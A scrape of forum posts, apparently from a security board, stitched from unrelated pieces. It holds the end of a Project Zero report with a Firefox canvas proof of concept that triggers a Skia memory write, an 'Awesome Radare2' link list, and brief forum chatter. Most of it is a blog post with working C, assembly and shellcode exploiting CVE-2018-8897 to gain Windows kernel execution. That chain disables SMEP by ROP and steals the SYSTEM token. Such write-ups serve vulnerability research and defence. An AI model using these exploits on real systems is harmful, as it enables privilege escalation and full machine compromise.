    #8 0xc8fbef in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPaint.cpp:1500:24
    #9 0xbdbc26 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1120:18
    #10 0x169b16e in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:9
    #11 0x169b16e in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:226
    #12 0xb748d1 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2167:9
    #13 0xb6b01a in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1757:5
    #14 0x8031dc in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:49:5
    #15 0x7ff2dac392b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
    #16 0x733519 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x733519)

The issue can also be triggered via the web in Mozilla Firefox.

PoC for Mozilla Firefox on Linux (I used a Firefox ASan build from https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer):
=================================================================
<canvas id="canvas" width="64" height="64"></canvas>
<br>
<button onclick="go()">go</button>
<script>
var canvas = document.getElementById("canvas");
var ctx = canvas.getContext("2d");

function go() {
  ctx.beginPath();
  ctx.mozImageSmoothingEnabled = false;
  ctx.webkitImageSmoothingEnabled = false;
  ctx.msImageSmoothingEnabled = false;
  ctx.imageSmoothingEnabled = false;
  linedasharr = [0, 1e+37];
  ctx.setLineDash(linedasharr);
  quadraticarr = [13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613];
  ctx.moveTo(0, 0);
  numpoints = 1;
  i = 1;
  qaindex = 0;
  while(numpoints < 2147483647) {
    if(numpoints == quadraticarr[qaindex]) {
      ctx.quadraticCurveTo(i, 0, i, 0);
      qaindex++;
      numpoints += 2;
    } else {
      ctx.lineTo(i, 0);
      numpoints += 1;
    }
    i++;
    if(i == 1000000) {
      ctx.moveTo(0, 0);
      numpoints += 1;
      i = 1;
    }
  }
  alert("done building path");
  ctx.stroke();
  alert("exploit failed");
}
</script>
=================================================================

ASan output:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==37732==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff86d20e7d8 (pc 0x7ff7c1233701 bp 0x7fffd19dd5f0 sp 0x7fffd19dd420 T0)
==37732==The signal is caused by a WRITE memory access.
    #0 0x7ff7c1233700 in append /builds/worker/workspace/build/src/gfx/skia/skia/include/core/../private/SkTDArray.h:184:17
    #1 0x7ff7c1233700 in SkPathMeasure::buildSegments() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:342
    #2 0x7ff7c1235be1 in getLength /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:516:15
    #3 0x7ff7c1235be1 in SkPathMeasure::nextContour() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:688
    #4 0x7ff7c112905e in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /builds/worker/workspace/build/src/gfx/skia/skia/src/utils/SkDashPath.cpp:307:19
    #5 0x7ff7c0bf9ed0 in SkDashPathEffect::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/effects/SkDashPathEffect.cpp:40:12
    #6 0x7ff7c1210ed6 in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPaint.cpp:1969:37
    #7 0x7ff7c0ec9156 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1141:25
    #8 0x7ff7c0b8de4b in drawPath /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.h:55:15
    #9 0x7ff7c0b8de4b in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDevice.cpp:235
    #10 0x7ff7c0bbc691 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2227:23
    #11 0x7ff7b86965b4 in mozilla::gfx::DrawTargetSkia::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&, mozilla::gfx::StrokeOptions const&, mozilla::gfx::DrawOptions const&) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:829:12
    #12 0x7ff7bbd34dcc in mozilla::dom::CanvasRenderingContext2D::Stroke() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3562:11
    #13 0x7ff7ba9b0701 in mozilla::dom::CanvasRenderingContext2DBinding::stroke(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3138:13
    #14 0x7ff7bbc3b4d1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13
    #15 0x7ff7c26ae3b8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15
    #16 0x7ff7c26ae3b8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #17 0x7ff7c28ecd17 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2383:14
    #18 0x1a432b56061a (<unknown module>)

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Sursa: https://bugs.chromium.org/p/project-zero/issues/detail?id=1541
-
Awesome Radare2

A curated list of awesome projects, articles and other materials powered by Radare2.

What is Radare2?

Radare is a portable reversing framework that can...

- Disassemble (and assemble for) many different architectures
- Debug with local native and remote debuggers (gdb, rap, r2pipe, winedbg, windbg, ...)
- Run on Linux, *BSD, Windows, OSX, Android, iOS, Solaris and Haiku
- Perform forensics on filesystems and data carving
- Be scripted in Python, Javascript, Go and more
- Visualize data structures of several file types
- Patch programs to uncover new features or fix vulnerabilities
- Use powerful analysis capabilities to speed up reversing
- Aid in software exploitation

More info here.

Table of Contents

- Books
- Videos
- Recordings
- Asciinemas
- Conferences
- Slides
- Tutorials and Blogs
- Tools
- Scripts
- Contributing

Awesome Radare2 Materials

Books

- R2 "Book"
- Radare2 Explorations
- Radare2 wiki

Videos

Recordings

- Creating a keygen for FrogSek KGM#1 - by @binaryheadache
- Radare2 - An Introduction with a simple CrackMe - Part 1 - by @antojosep007
- Introduction To Reverse Engineering With Radare2
- Scripting radare2 with python for dynamic analysis - TUMCTF 2016 Zwiebel part 2

Asciinemas

- metasploit x86/shikata_ga_nai decoder using r2pipe and ESIL
- Filter for string's searching (urls, emails)
- Manual unpacking UPX on linux 64-bit

Conferences

- r2con 2017
- LinuxDays 2017 - Disassembling with radare2
- SUE 2017 - Reverse Engineering Embedded ARM Devices
- radare demystified (33c3)
- r2con 2016
- Reversing with Radare2 - OverDrive Conference
- Radare2 & frida hack-a-ton 2015
- Radare from A to Z 2015
- Reverse engineering embedded software using Radare2 - Linux.conf.au 2015
- OggCamp - Shellcode - vext01

Slides and Workshops

- Radare2 cheat-sheet
- r2m2 - radare2 + miasm2 = ♥
- Radare2 Workshop 2015 (Defcon)
- Emulating Code In Radare2
- Radare from A to Z 2015
- Radare2 Workshop 2015 (Hack.lu)
- Radare2 & frida hack-a-ton 2015
- radare2: evolution
- radare2: from forensics to bindiffing

Tutorials and Blogs

- Linux Malware - by @MalwareMustDie
- Radare2 - Using Emulation To Unpack Metasploit Encoders - by @xpn
- Reverse engineering a Gameboy ROM with radare2 - by @megabeets_
- radare2 as an alternative to gdb-peda
- How to find offsets for v0rtex (by Siguza)
- Debugging a Forking Server with r2
- Defeating IOLI with radare2 in 2017
- Using r2 to analyse Minidumps
- Android malware analysis with Radare: Dissecting the Triada Trojan
- Solving game2 from the badge of Black Alps 2017 with radare2
- ROPEmporium: Pivot 64-bit CTF Walkthrough With Radare2
- ROPEmporium: Pivot 32-bit CTF Walkthrough With Radare2
- Reversing EVM bytecode with radare2
- Radare2's Visual Mode
- Crackme0x03 Dissected with Radare2
- Crackme0x02 Dissected with Radare2
- Crackme0x01 Dissected with Radare2
- Debugging Using Radare2… and Windows! - by @jacob16682
- Decrypting APT33's Dropshot Malware with Radare2 and Cutter – Part 1 - by @megabeets_
- A journey into Radare 2 – Part 2: Exploitation - by @megabeets_
- A journey into Radare 2 – Part 1: Simple crackme - by @megabeets_
- Reverse Engineering With Radare2 - by @insinuator
- Write-ups from RHME3 pre-qualifications at RADARE2 conference
- Hackover CTF 2016 - tiny_backdoor writeup
- radare2 redux: Single-Step Debug a 64-bit Executable and Shared Object
- Reversing and Exploiting Embedded Devices: The Software Stack (Part 1)
- Binary Bomb with Radare2 - by @binaryheadache
- crackserial_linux with radare2 - by @binaryheadache
- Examining malware with r2 - by @binaryheadache
- Breaking Cerber strings obfuscation with Python and radare2 - by @aaSSfxxx
- Radare2 of the Lost Magic Gadget - by @0xabe_io
- Radare 2 in 0x1E minutes - by @superkojiman
- Exploiting ezhp (pwn200) from PlaidCTF 2014 with radare2
- Baleful was a challenge released in picoctf
- At Gunpoint Hacklu 2014 With Radare2 - by @crowell
- Pwning With Radare2 - by @crowell
- Solving 'heap' from defcon 2014 qualifier with r2 - by @alvaro_fe
- How to radare2 a fake openssh exploit - by jvoisin
- Disassembling 6502 code with Radare – Part I - by @ricardoquesada
- Disassembling 6502 code with Radare – Part II - by @ricardoquesada
- Unpacking shikata-ga-nai by scripting radare2
- This repository contains a collection of documents, scripts and utilities that will allow you to use IDA and R2
- Raspberry PI hang instruction - by @pancake
- Solving avatao's "R3v3rs3 4" - by @sghctoma
- Reverse Engineering With Radare2, Part 1 - by @sam_symons
- Simple crackme with Radare2 - by @futex90
- Pwning With Radare2 - by @crowell
- Reversing the FBI malware's payload (shellcode) with radare2 - by @MalwareMustDie
- ROPping to Victory
- ROPping to Victory - Part 2, split

Tools

- Docker image encapsulates the reverse-engineering framework
- Malfunction - Malware Analysis Tool using Function Level Fuzzy Hashing
- rarop - graphical ROP chain builder using radare2 and r2pipe
- Radare2 and Frida better together
- Android APK analyzer based on radare2

Scripts

- helper radare2 script to analyze UEFI firmware modules
- ThinkPwn Scanner - by @d_olex and @trufae
- radare2-lldb integration
- create a YARA signature for the bytes of the current function
- A radare2 Plugin to perform symbolic execution with a simple macro call (r2 + angr)
- Just a simple radare2 Jupyter kernel
- r2scapy - a radare2 plugin that decodes packets with Scapy
- A plugin for Hex-Ray's IDA Pro and radare2 to export the symbols recognized to the ELF symbol table
- radare2 plugin - converts asm to pseudo-C code (experimental)
- A python script using radare2 to decrypt and patch the strings of GootKit malware
- Collection of scripts for radare2 for MIPS arch
- Extract functions and opcodes with radare2 - by @andrewaeva
- r2-ropstats - a set of tools based on radare2 for analysis of ROP gadgets and payloads
- Patch kextd using radare2
- Python-r2pipe script that draws ascii and graphviz graphs of library dependencies
- Simple XOR DDOS strings deobfuscator - by @NighterMan
- Decode multiple shellcodes encoded with msfencode - by @NighterMan
- Baleful CTF task plugins

Contributing

Please refer to the guidelines at contributing.md for details.
Sursa: https://github.com/dukebarman/awesome-radare2
-
-
-
-
I don't know how it is on the phone, but under Activity you can configure how the personalized feed looks.
-
I sometimes post the same way. The point is that those posts are useful. Among @OKQL's posts I found things I didn't know about, and in general I keep up with pretty much everything that comes out.
-
1. http://jsbeautifier.org/
2. Replace eval with alert (for example)
3. http://jsbeautifier.org/
4. You have eval again

I don't have time for more at the moment.
-
Arbitrary Code Execution at Ring 0 using CVE-2018-8897
Can Bölük, May 11, 2018

Just a few days ago, a new vulnerability allowing an unprivileged user to run a #DB handler with user-mode GSBASE was found by Nick Peterson (@nickeverdox) and Nemanja Mulasmajic (@0xNemi). At the end of the whitepaper they published on triplefault.io, they mentioned that they were able to load and execute unsigned kernel code, which got me interested in the challenge; and that's exactly what I'm going to attempt doing in this post.

Before starting, I would like to note that this exploit may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. I debugged it by "simulating" this situation. The final source code can be found at the bottom.

0x0: Setting Up the Basics

The fundamentals of this exploit are really simple, unlike its exploitation. When the stack segment is changed, whether via MOV or POP, interrupts are deferred until the next instruction completes. This is not a microcode bug but rather a feature added by Intel so that the stack segment and stack pointer can be set at the same time. However, many OS vendors missed this detail, which lets us raise a #DB exception from user mode that the kernel handles as if it came from CPL0.

We can create a deferred-to-CPL0 exception by setting the debug registers in such a way that a #DB is raised during the execution of a stack-segment-changing instruction, and calling int 3 right after. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised. As mentioned by everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted.
All of this can be done in a few lines, as shown below:

#include <Windows.h>
#include <iostream>

void main()
{
    static DWORD g_SavedSS = 0;
    _asm
    {
        mov ax, ss
        mov word ptr [ g_SavedSS ], ax
    }

    CONTEXT Ctx = { 0 };
    Ctx.Dr0 = ( DWORD ) &g_SavedSS;
    Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 );
    Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
    SetThreadContext( HANDLE( -2 ), &Ctx );

    PVOID FakeGsBase = ...;

    _asm
    {
        mov eax, FakeGsBase ; Set eax to fake gs base
        push 0x23
        push X64_End
        push 0x33
        push X64_Start
        retf

    X64_Start:
        __emit 0xf3 ; wrgsbase eax
        __emit 0x0f
        __emit 0xae
        __emit 0xd8
        retf

    X64_End:
        ; Vulnerability
        mov ss, word ptr [ g_SavedSS ] ; Defer debug exception
        int 3 ; Execute with interrupts disabled
        nop
    }
}

This example is 32-bit for the sake of showing ASM and C together; the final working code will be 64-bit. Now let's start debugging: we are in KiDebugTrapOrFault with our custom GSBASE! However, this is nothing but catastrophic. Almost no function works, and we will end up in a KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->... infinite loop. If we had a perfectly valid GSBASE, the outcome of what we achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let's focus on making GSBASE function like the real one and try to get to KeBugCheckEx.

We can utilize a small IDA script to step to the relevant parts faster:

#include <idc.idc>

static main()
{
    Message( "--- Step Till Next GS ---\n" );
    while( 1 )
    {
        auto Disasm = GetDisasmEx( GetEventEa(), 1 );
        if ( strstr( Disasm, "gs:" ) >= Disasm )
            break;
        StepInto();
        GetDebuggerEvent( WFNE_SUSP, -1 );
    }
}

0x1: Fixing the KPCR Data

Here are the few cases where we have to modify the GSBASE contents to pass through successfully:

– KiDebugTrapOrFault

KiDebugTrapOrFault:
...
MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h

Pcr.Prcb.MxCsr needs to have a valid combination of flags to pass this instruction or else it will raise a #GP. So let's set it to its initial value, 0x1F80.
– KiExceptionDispatch

KiExceptionDispatch:
...
MEMORY:FFFFF8018C20DB5F mov rax, gs:188h
MEMORY:FFFFF8018C20DB68 bt dword ptr [rax+74h], 8

Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h.

– KiDispatchException

KiDispatchException:
...
MEMORY:FFFFF8018C12A4D8 mov rax, gs:qword_188
MEMORY:FFFFF8018C12A4E1 mov rax, [rax+0B8h]

This is Pcr.Prcb.CurrentThread.ApcStateFill.Process, and again we are going to allocate a block of memory and simply make this pointer point to it.

KeCopyLastBranchInformation:
...
MEMORY:FFFFF8018C12A0AC mov rax, gs:qword_20
MEMORY:FFFFF8018C12A0B5 mov ecx, [rax+148h]

0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let's set Pcr.CurrentPrcb to Pcr + 0x180, and also set Pcr.Self to &Pcr while on it.

– RtlDispatchException

This one is going to be a little bit more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if it fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack and Pcr.Prcb.IsrStack, and if it doesn't find a match it reports failure. We obviously cannot know the value of the kernel stack from user-mode, so what to do? There's a weird check in the middle of the function:

char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3)
{
    ...
    if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) )
    {
        ...
    }
    else
    {
        *v5 = 5;
        result = 1;
        *v3 = 0xFFFFFFFFFFFFFFFFi64;
        *v4 = 0xFFFF800000000000i64;
    }
    return result;
}

Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h), KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range.
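The logic of that check can be sketched as a tiny model (JavaScript standing in for the decompiled C above; this is illustrative, not kernel code):

```javascript
// Model of the KeQueryCurrentStackInformation check: when
// KThread.InitialStack != Prcb.RspBase, the real RSP validation is
// skipped and a catch-all "stack range" is reported as success.
function queryStackInfo(initialStack, rspBase) {
  if (initialStack === rspBase) {
    // Real path: RSP would be compared against actual kernel stack
    // bounds, which we cannot know from user mode.
    return { ok: false };
  }
  return { ok: true, low: 0xFFFF800000000000n, high: 0xFFFFFFFFFFFFFFFFn };
}

// Any mismatched pair guarantees the permissive path:
const info = queryStackInfo(0n, 1n);
console.log(info.ok); // true -> every kernel address passes the limit check
```

Since the reported range covers the entire upper half of the address space, whatever RSP the faked KPCR produces will pass the stack-limit check.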
Let's go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved. RtlDispatchException after these changes will fail without bugchecking and return to KiDispatchException.

– KeBugCheckEx

We are finally here. Here's the last thing we need to fix:

MEMORY:FFFFF8018C1FB94A mov rcx, gs:qword_20
MEMORY:FFFFF8018C1FB953 mov rcx, [rcx+62C0h]
MEMORY:FFFFF8018C1FB95A call RtlCaptureContext

Pcr.CurrentPrcb->Context is where KeBugCheck saves the context of the caller, and for some weird reason it is a PCONTEXT instead of a CONTEXT. We don't really care about any other fields of Pcr, so let's just set it to Pcr + 0x3000 for the sake of having a valid pointer for now.

0x2: and Write|What|Where

And there we go, sweet sweet blue screen of victory! Now that everything works, how can we exploit it? The code after KeBugCheckEx is too complex to step through one by one, and it is most likely not-so-fun to revert from, so let's try NOT to bugcheck this time. I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls to registers and [register+x]) and made it step until KeBugCheckEx is hit:

#include <idc.idc>

static main()
{
    Message( "--- Logging Points of Interest ---\n" );
    while( 1 )
    {
        auto IP = GetEventEa();
        auto Disasm = GetDisasmEx( IP, 1 );
        if ( ( strstr( Disasm, "gs:" ) >= Disasm ) ||
             ( strstr( Disasm, "jmp r" ) >= Disasm ) ||
             ( strstr( Disasm, "call r" ) >= Disasm ) ||
             ( strstr( Disasm, "jmp" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) ||
             ( strstr( Disasm, "call" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) )
        {
            Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm );
        }
        StepInto();
        GetDebuggerEvent( WFNE_SUSP, -1 );
        if( IP == ... )
            break;
    }
}

To my disappointment, there are no convenient jumps or calls.
The whole output is:

- KiDebugTrapOrFault (+3d): test word ptr gs:278h, 40h
- sub_FFFFF8018C207019 (+5): ldmxcsr dword ptr gs:180h
-- KiExceptionDispatch (+5f): mov rax, gs:188h
--- KiDispatchException (+48): mov rax, gs:188h
--- KiDispatchException (+5c): inc gs:5D30h
---- KeCopyLastBranchInformation (+38): mov rax, gs:20h
---- KeQueryCurrentStackInformation (+3b): mov rax, gs:188h
---- KeQueryCurrentStackInformation (+44): mov rcx, gs:1A8h
--- KeBugCheckEx (+1a): mov rcx, gs:20h

This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it takes the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it.

I was originally going to make it write over g_CiOptions and continuously NtLoadDriver in another thread, but this idea did not work as well as I thought (that being said, apparently this is the way @0xNemi and @nickeverdox got it working; I guess we will see what dark magic they used at BlackHat 2018), simply because the current thread is stuck in an infinite loop and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses:

NtLoadDriver->...->MiSetProtectionOnSection->KeFlushMultipleRangeTb->IPI->Deadlock

After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext. How are we going to overwrite the return address without having access to RSP? If we use a little bit of creativity, we actually can have access to RSP. We can get the current RSP by making Prcb.Context point to user-mode memory and polling the Context.Rsp value from a secondary thread. Sadly, this is not useful by itself, as we have already passed RtlCaptureContext (our write-what-where exploit) by the time we read it.
However, if we could return back to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable; which is exactly what we are going to do. To return back to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made:

.text:000000014017595F mov rcx, gs:20h
.text:0000000140175968 add rcx, 100h
.text:000000014017596F call KiSaveProcessorControlState

.text:0000000140175C80 KiSaveProcessorControlState proc near ; CODE XREF: KeBugCheckEx+3Fp
.text:0000000140175C80                               ; KeSaveStateForHibernate+ECp
...
.text:0000000140175C80 mov rax, cr0
.text:0000000140175C83 mov [rcx], rax
.text:0000000140175C86 mov rax, cr2
.text:0000000140175C89 mov [rcx+8], rax
.text:0000000140175C8D mov rax, cr3
.text:0000000140175C90 mov [rcx+10h], rax
.text:0000000140175C94 mov rax, cr4
.text:0000000140175C97 mov [rcx+18h], rax
.text:0000000140175C9B mov rax, cr8
.text:0000000140175C9F mov [rcx+0A0h], rax

We will set DR1 on gs:20h + 0x100 + 0xA0, and make KeBugCheckEx return back to KiDebugTrapOrFault just after it saves the value of CR4.

To overwrite the return pointer, we will first let KiDebugTrapOrFault->...->RtlCaptureContext execute once, giving our user-mode thread an initial RSP value; then we will let it execute another time to get the new RSP, which will let us calculate the per-execution RSP difference. This RSP delta will be constant because the control flow is also constant. Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from that to calculate the location of the return pointer of RtlCaptureContext, and make Prcb.Context->Xmm13 - Prcb.Context->Xmm15 get written over it.
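The prediction arithmetic itself is tiny. Here it is as a standalone sketch (JavaScript BigInts standing in for 64-bit values; the two RSP samples are made-up numbers for illustration):

```javascript
// Sketch of the return-pointer prediction. Two leaked RSP values give a
// constant delta, because the control flow between sequential
// KiDebugTrapOrFault entries is constant.
function predictRetPtrSlot(rspFirst, rspSecond) {
  const stackDelta = rspSecond - rspFirst;
  const predictedNextRsp = rspSecond + stackDelta;
  let retPtrSlot = predictedNextRsp - 8n; // return address sits just below RSP
  retPtrSlot &= ~0xFn;                    // align down for movaps (16 bytes)
  return retPtrSlot;
}

const slot = predictRetPtrSlot(0xFFFFF00ED7A1C000n, 0xFFFFF00ED7A1B000n);
console.log(slot.toString(16)); // fffff00ed7a19ff0
```

Because the slot is aligned down to 16 bytes, we cannot know which 8-byte half of XMM15 lands exactly on the return address, which is why the chain starts with two plain RETN gadgets.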
Thread logic will be like the following:

volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context );

while ( !Ctx->Rsp ); // Wait for RtlCaptureContext to be called once so we get leaked RSP
uint64_t StackInitial = Ctx->Rsp;

// Wait for it to be called another time so we get the stack pointer difference
// between sequential KiDebugTrapOrFault
while ( Ctx->Rsp == StackInitial );
StackDelta = Ctx->Rsp - StackInitial;

PredictedNextRsp = Ctx->Rsp + StackDelta; // Predict next RSP value when RtlCaptureContext is called

uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8; // Predict where the return pointer will be located at
NextRetPtrStorage &= ~0xF;

// Make RtlCaptureContext write XMM13-XMM15 over it
*( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13;

Now we simply need to set up a ROP chain and write it to XMM13-XMM15. We cannot predict which half of XMM15 will get hit due to the mask we apply to comply with the movaps alignment requirement, so the first two pointers should simply point at a [RETN] instruction. We need to load a register with a value we choose to set CR4 to, so XMM14 will point at a [POP RCX; RETN] gadget, followed by a valid CR4 value with SMEP disabled. As for XMM13, we are simply going to use a [MOV CR4, RCX; RETN] gadget followed by a pointer to our shellcode.
The final chain will look something like:

-- &retn;               (fffff80372e9502d)
-- &retn;               (fffff80372e9502d)
-- &pop rcx; retn;      (fffff80372ed9122)
-- cr4_nosmep           (00000000000506f8)
-- &mov cr4, rcx; retn; (fffff803730045c7)
-- &KernelShellcode     (00007ff613fb1010)

In our shellcode, we will need to restore the CR4 value, swapgs, roll back the ISR stack, execute the code we want, and IRETQ back to user-mode, which can be done like below:

NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0;

using fnIRetToVulnStub = void( * ) ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup );

NON_PAGED_DATA BYTE IRetToVulnStub[] =
{
    0x0F, 0x22, 0xE1,   // mov cr4, rcx ; cr4 = original cr4
    0x48, 0x89, 0xD4,   // mov rsp, rdx ; stack = isr stack
    0x4C, 0x89, 0xC1,   // mov rcx, r8  ; rcx = ContextBackup
    0xFB,               // sti          ; enable interrupts
    0x48, 0xCF          // iretq        ; interrupt return
};

NON_PAGED_CODE void KernelShellcode()
{
    __writedr( 7, 0 );

    uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 );
    __writecr4( Cr4Old & ~( 1 << 20 ) );
    __swapgs();

    uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38;

    // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault
    while ( ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 &&
            ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF )
    {
        __rollback_isr( IsrStackIterator );

        // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta
        if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 )
        {
            /*
                fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap
                fffff00e`d7a1bc40 0000000000000010
                fffff00e`d7a1bc48 0000000000000002
                fffff00e`d7a1bc50 fffff00ed7a1bc68
                fffff00e`d7a1bc58 0000000000000000
                fffff00e`d7a1bc60 0000000000000014
                fffff00e`d7a1bc68 00007ff7e2261e95 --
                fffff00e`d7a1bc70 0000000000000033
                fffff00e`d7a1bc78 0000000000000202
                fffff00e`d7a1bc80 000000ad39b6f938
            */
            IsrStackIterator = IsrStackIterator + 0x30;
            break;
        }
        IsrStackIterator -= StackDelta;
    }

    PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) );
    Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) );

    // ------ KERNEL CODE ------
    ....
    // ------ KERNEL CODE ------

    __swapgs();
    ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1;
    ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup );
}

We can't restore any registers, so we will make the thread responsible for the execution of the vulnerability store the context in a global container and restore from it instead. Now that we have executed our code and returned to user-mode, our exploit is complete! Let's make a simple demo stealing the System token:

uint64_t SystemProcess = *k_PsInitialSystemProcess;
uint64_t CurrentProcess = k_PsGetCurrentProcess();

uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess );
uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess );

for ( int i = 0; i < 0x500; i += 0x8 )
{
    uint64_t Member = *( uint64_t * ) ( CurrentProcess + i );
    if ( ( Member & ~0xF ) == CurrentToken )
    {
        *( uint64_t * ) ( CurrentProcess + i ) = SystemToken;
        break;
    }
}

k_PsDereferencePrimaryToken( CurrentToken );
k_PsDereferencePrimaryToken( SystemToken );

The complete implementation of the concept can be found at: https://github.com/can1357/CVE-2018-8897

